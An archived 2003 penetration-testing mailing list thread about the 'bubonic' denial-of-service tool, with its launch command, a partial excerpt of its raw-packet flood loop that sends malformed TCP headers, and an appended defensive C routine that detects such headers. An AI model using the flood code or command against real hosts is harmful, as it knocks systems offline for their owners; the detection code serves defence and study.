Penetration Testing mailing list archives
RE: Bubonic DoS tool
From: "Yonatan Bokovza" <Yonatan () xpert com>
Date: Tue, 11 Mar 2003 12:09:40 +0200
-----Original Message-----
From: Indian Tiger [mailto:indiantiger () mailandnews com]
Sent: Thursday, February 06, 2003 18:43
To: pen-test () securityfocus com
Cc: sil () antioffline com
Subject: Bubonic DoS tool

Hi All,

I was testing the "Bubonic.c lame DoS against Windows 2000 machines and certain versions of Linux" in a test scenario over Linux 8.0. I have compiled its source code and am running its binary as follows:

# ./bubonic 10.3.10.22 10.3.8.70 100 1000

On executing the above command, there was no observable immediate effect, but the Hub was showing the collisions (which were the Red Steady). Ethereal shows the packets routed to destination. But after executing the command the destination machine must be blocked/freeze, but it's not happening.
The code is very easy to understand. The "interesting" part is in flooder(), my comments inline:

    void flooder(void)
    {
        ...
        packet.ip.ip_p = IPPROTO_TCP;
        packet.ip.ip_tos = rand();
        ...
        packet.tcp.th_flags = random();
        packet.tcp.th_win = 65535;
        packet.tcp.th_seq = random();
        packet.tcp.th_ack = 0;
        packet.tcp.th_off = 0;
        packet.tcp.th_urp = random();
        packet.tcp.th_dport = random();
        ...
        cksum.pseudo.ptcl = IPPROTO_TCP;
        cksum.pseudo.tcpl = random();
        ...
        for(i=0;;++i) {
            ...
            if (sendto(sock, &packet, sizeof(packet), 0,
                       (struct sockaddr *)&s_in, sizeof(s_in)) < 0);
        }
    }

To sum up and simplify, this sends TCP packets with a bad header. As a result, my unpatched win2k's CPU graph stays over 90% in the kernel, causing Albinoni to sound bad.

Best Regards,
Yonatan Bokovza
IT Security Consultant
Xpert Systems
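For defenders, the "bad header" described in the reply above can be recognised from the TCP header alone. The following is an added example, not part of the original post or of bubonic.c: a small validator that flags the field pattern visible in the excerpt (data offset below the 5-word minimum, arbitrary flag combinations, an urgent pointer without URG). The function name, the anomaly constants and both sample segments are constructed for this illustration, and the flag checks are common filtering heuristics rather than a complete conformance test.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Anomaly bits (names are this example's own, not from any library). */
enum {
    TCP_A_TRUNCATED  = 1 << 0, /* fewer than 20 bytes of TCP header         */
    TCP_A_BAD_OFFSET = 1 << 1, /* th_off < 5 words, or header past segment  */
    TCP_A_SYN_FIN    = 1 << 2, /* SYN and FIN set together                  */
    TCP_A_SYN_RST    = 1 << 3, /* SYN and RST set together                  */
    TCP_A_NO_FLAGS   = 1 << 4, /* none of SYN/FIN/RST/ACK set               */
    TCP_A_URG_PTR    = 1 << 5  /* th_urp non-zero without the URG flag      */
};

/* Inspect a raw TCP segment (header first, network byte order) and return
 * a bitmask of the anomalies above; 0 means the header looks sane. */
unsigned tcp_header_anomalies(const uint8_t *seg, size_t len)
{
    unsigned a = 0;
    if (len < 20)
        return TCP_A_TRUNCATED;
    unsigned off   = seg[12] >> 4;                       /* th_off   */
    unsigned flags = seg[13] & 0x3f;                     /* th_flags */
    unsigned urp   = ((unsigned)seg[18] << 8) | seg[19]; /* th_urp   */
    if (off < 5 || (size_t)off * 4 > len) a |= TCP_A_BAD_OFFSET;
    if ((flags & 0x03) == 0x03)           a |= TCP_A_SYN_FIN;
    if ((flags & 0x06) == 0x06)           a |= TCP_A_SYN_RST;
    if ((flags & 0x17) == 0)              a |= TCP_A_NO_FLAGS;
    if (urp != 0 && !(flags & 0x20))      a |= TCP_A_URG_PTR;
    return a;
}

/* Constructed samples: an ordinary SYN, and a header with the field pattern
 * the excerpt produces (th_off = 0, arbitrary flags and urgent pointer). */
static const uint8_t sample_syn[20] = {
    0xc0,0x01, 0x00,0x50, 0,0,0,1, 0,0,0,0, 0x50,0x02, 0xff,0xff, 0,0, 0,0 };
static const uint8_t sample_bad[20] = {
    0xc0,0x01, 0x9a,0x3c, 0,0,0,1, 0,0,0,0, 0x00,0x03, 0xff,0xff, 0,0, 0x12,0x34 };

int main(void)
{
    printf("syn: 0x%02x\n", tcp_header_anomalies(sample_syn, sizeof sample_syn));
    printf("bad: 0x%02x\n", tcp_header_anomalies(sample_bad, sizeof sample_bad));
    return 0;
}
```

A packet filter or IDS sensor in front of an unpatched host can drop or alert on any segment for which this returns non-zero; TCP_A_BAD_OFFSET alone already covers every packet built with th_off = 0.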
Current thread:
- Bubonic DoS tool Indian Tiger (Mar 09)
- <Possible follow-ups>
- RE: Bubonic DoS tool Yonatan Bokovza (Mar 11)
- RE: Bubonic DoS tool Indian Tiger (Mar 11)